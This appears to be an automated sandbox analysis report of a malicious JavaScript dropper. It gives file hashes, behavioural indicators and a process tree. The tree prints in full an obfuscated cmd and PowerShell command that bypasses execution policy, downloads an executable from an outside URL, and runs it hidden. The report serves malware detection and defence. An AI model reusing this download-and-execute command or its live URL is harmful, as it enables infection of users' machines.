Analysis
max time kernel: 17s
max time network: 110s
platform: windows10_x64
resource: win10v20201028
submitted: 18-01-2021 21:43

Static task: static1
Behavioral task: behavioral1
  Sample: 4IW7erkj68.js
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 4IW7erkj68.js
  Resource: win10v20201028
General
Target: 4IW7erkj68.js
Size: 21KB
MD5: ffff42a84871648a25ba2c39beca8d83
SHA1: 31acbb969b4b9d167f5ad4c78510ba2e8e0b4610
SHA256: c03c5f7dabff34048550ffe1290d714291c554cdffa85da7116c3b675aadb458
SHA512: b770666259807832786ee526c51ba18b59f80ba58a30d1ef892360bc88d71627674d341dea31f56221e821d072a67d1c62e82b3fd9b26338167046e3bcfdfe41
Malware Config
Extracted: http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php
Signatures

Blocklisted process makes network request (1 IoCs)
Processes:
  flow | pid  | process
  8    | 3708 | powershell.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  pid  | process
  3708 | powershell.exe
  3708 | powershell.exe
  3708 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description             | pid  | process
  Token: SeDebugPrivilege | 3708 | powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                       | pid  | process     | target process
  PID 812 wrote to memory of 2788   | 812  | wscript.exe | cmd.exe
  PID 812 wrote to memory of 2788   | 812  | wscript.exe | cmd.exe
  PID 2788 wrote to memory of 3708  | 2788 | cmd.exe     | powershell.exe
  PID 2788 wrote to memory of 3708  | 2788 | cmd.exe     | powershell.exe
Processes (process tree; indentation shows parent/child)

1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\4IW7erkj68.js
   - Suspicious use of WriteProcessMemory
   PID: 812

  2. C:\Windows\System32\cmd.exe
     Command line: "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%VKF54.exe'); & %temp%VKF54.exe & BTHpwAoayRPbclY
     - Suspicious use of WriteProcessMemory
     PID: 2788

    3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       Command line: pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempVKF54.exe');
       - Blocklisted process makes network request
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       PID: 3708
Network
MITRE ATT&CK Matrix
Downloads

C:\Users\Admin\AppData\Local\TempVKF54.exe
  MD5: 2f5cded6abfe8576ea9ce3c91916efb3
  SHA1: 2e45ab8e29f1a10b9261df8f1567b26cfd24284c
  SHA256: 2883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15
  SHA512: de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98

memory/2788-2-0x0000000000000000-mapping.dmp
memory/3708-3-0x0000000000000000-mapping.dmp
memory/3708-4-0x00007FFB852D0000-0x00007FFB85CBC000-memory.dmp
  Filesize: 9.9MB
memory/3708-5-0x0000014C9E5E0000-0x0000014C9E5E1000-memory.dmp
  Filesize: 4KB
memory/3708-6-0x0000014C9E3F0000-0x0000014C9E3F2000-memory.dmp
  Filesize: 8KB
memory/3708-7-0x0000014C9E3F3000-0x0000014C9E3F5000-memory.dmp
  Filesize: 8KB
memory/3708-8-0x0000014CB8BB0000-0x0000014CB8BB1000-memory.dmp
  Filesize: 4KB
memory/3708-9-0x0000014C9E3F6000-0x0000014C9E3F8000-memory.dmp
  Filesize: 8KB